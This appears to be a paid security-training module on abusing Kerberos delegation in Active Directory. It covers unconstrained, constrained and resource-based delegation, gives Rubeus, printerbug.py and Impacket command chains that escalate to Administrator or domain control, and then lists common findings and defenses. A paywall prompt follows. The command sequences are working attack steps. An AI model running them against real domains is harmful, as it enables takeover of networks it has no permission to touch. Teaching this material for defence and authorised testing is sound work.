Kerberos delegation lets a service act on behalf of a user when talking to another service. Web frontend authenticates user; web frontend needs to query backend DB as that user; delegation lets this work without the user directly authenticating to the DB. It’s a useful feature. It’s also one of the most abused paths to Domain Admin in modern engagements.

The three delegation types

Unconstrained: service can act as user for ANY other service. Attacker who compromises an unconstrained-delegation server gets TGT of every user who authenticates to it.
Constrained: service can act as user for SPECIFIC other services. Abuse via S4U2Self + S4U2Proxy chain.
Resource-Based Constrained Delegation (RBCD): introduced 2012. Target resource specifies which accounts can delegate to it. Changed the attack surface significantly.

Unconstrained delegation abuse

When a computer has unconstrained delegation, any user who authenticates to it has their TGT cached on that computer (so it can be used to authenticate onwards). This is a classic massive risk.

# Find unconstrained delegation computers
Get-DomainComputer -Unconstrained -Properties Name, DNSHostName

# If attacker compromises SERVER01 (unconstrained delegation enabled)
# Wait for privileged user to authenticate to SERVER01
# (Coerce if needed: PetitPotam, PrinterBug to make DC authenticate)

# Extract cached TGT
Rubeus triage    # shows cached tickets
Rubeus dump /luid:0x1234abcd    # extracts specific ticket
Rubeus ptt /ticket:BASE64TICKET   # use the ticket

# Coercion via PrinterBug
# Tool: SpoolSample.exe or printerbug.py
python3 printerbug.py corp/user:pass@DC01.corp.local SERVER01.corp.local
# DC01 authenticates to SERVER01 → DC$ TGT cached → DCSync possible

Constrained delegation abuse (S4U)

If you control a service account configured with constrained delegation to target service, you can impersonate any user to that service.

# Enumerate constrained delegation
Get-DomainUser -TrustedToAuth -Properties samaccountname, msDS-AllowedToDelegateTo
Get-DomainComputer -TrustedToAuth -Properties name, msDS-AllowedToDelegateTo

# If SVC_WEB has delegation to HTTP/backend.corp.local
# and you control SVC_WEB credentials:

Rubeus s4u /user:SVC_WEB /rc4:NTLMHASH /impersonateuser:Administrator \
    /msdsspn:HTTP/backend.corp.local /altservice:cifs /ptt

# Now authenticated as Administrator with a CIFS ticket to backend
# Even though msDS-AllowedToDelegateTo specified HTTP, altservice trick
# allows CIFS too (same underlying computer account target)

Resource-Based Constrained Delegation (RBCD)

Classic delegation: trust flows from source (attribute on source). RBCD: trust flows from target (target lists allowed delegators via msDS-AllowedToActOnBehalfOfOtherIdentity). Attack: if you can write to that attribute on a target, you control who can delegate to it.

# Scenario: you have GenericWrite on computer TARGET-SRV
# MachineAccountQuota default = 10, so you can create a new computer account

# Step 1: Create new computer account
python3 addcomputer.py -computer-name 'FAKE$' -computer-pass 'Pass123!' \
    -dc-host dc.corp.local corp.local/alice:Password1

# Step 2: Set msDS-AllowedToActOnBehalfOfOtherIdentity on TARGET-SRV
python3 rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET-SRV$' \
    -action write corp.local/alice:Password1

# Step 3: Request ticket impersonating Administrator
python3 getST.py -spn 'cifs/TARGET-SRV.corp.local' \
    -impersonate Administrator \
    corp.local/'FAKE$':'Pass123!'

# Step 4: Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass TARGET-SRV.corp.local

Printer Bug / PetitPotam coercion

Many delegation attacks require “make this specific machine authenticate to my controlled machine.” Coercion primitives:

PrinterBug (MS-RPRN): spooler service. CVE-2021-34527. Triggers authentication via print job notification. Patched variants exist.
PetitPotam (MS-EFSRPC): Encrypted File System RPC. Well-known coercion. Patched in stages.
DFSCoerce (MS-DFSNM): DFS Namespace. Similar pattern.
Shadow Credentials (msDS-KeyCredentialLink): 2021 technique, write to attribute enables cert-based logon for that user.

Real-world incidents

Ransomware playbook: Initial foothold → BloodHound → identify delegation paths → RBCD + coercion → DA. Standard in Conti / LockBit / BlackCat operations.
PetitPotam + ADCS ESC8: Chain became the go-to mid-engagement escalation 2021-2024. Force DC to authenticate; relay to ADCS; get DC cert; DCSync.
Unconstrained delegation on Exchange servers: Legacy Exchange installations had unconstrained delegation by default. Any compromise of Exchange = DA TGT for anyone emailing that server.

What we find

Servers (non-DC) with unconstrained delegation enabled — classic legacy finding
Service accounts with constrained delegation to sensitive SPNs (DC cifs, LDAP, etc.)
MachineAccountQuota set to default 10 (enables RBCD attacks by any user)
Print Spooler running on DCs (PrinterBug)
EFSRPC accessible on DCs (PetitPotam)
ADCS web enrollment without EPA (relay target)
Shadow credential attribute writable by non-privileged users

Defenses

Disable unconstrained delegation wherever possible. Legitimate use cases are rare in 2026.
Add sensitive accounts to ‘Account is sensitive and cannot be delegated’ group (or Protected Users — stronger).
Set MachineAccountQuota to 0 for non-privileged users. Manage computer account creation via delegation groups.
Disable Print Spooler on DCs. Non-negotiable.
Apply PetitPotam mitigation (registry setting blocking anonymous EFSRPC).
Apply all Windows patches for coercion vulnerabilities.
Enable SMB signing + LDAP signing + channel binding (blocks many relay paths).
Enable Extended Protection for Authentication on ADCS web enrollment.
Audit msDS-AllowedToActOnBehalfOfOtherIdentity changes — alert on writes.
Monitor for Rubeus / Impacket signatures on endpoints.

Mindset takeaway

Delegation is necessary complexity. The abuses require specific conditions (specific attributes, specific ACL writes, specific coercion primitives). Each condition is fixable. Each is often unfixed in real environments.

🔐 Advanced Module · Pro Tier

Continue reading with Pro tier (₹4,999/year)

You've read 38% of this module. Unlock the remaining deep-dive, quiz, and every other Advanced/Expert module.

136+ modulesAll levels up to this tier

20-question quizzesUnlimited retries with explanations

Completion certificatesShareable on LinkedIn

See pricing → Sign in

2 more sections locked below

Module 8 · Kerberos Delegation Abuse 🔒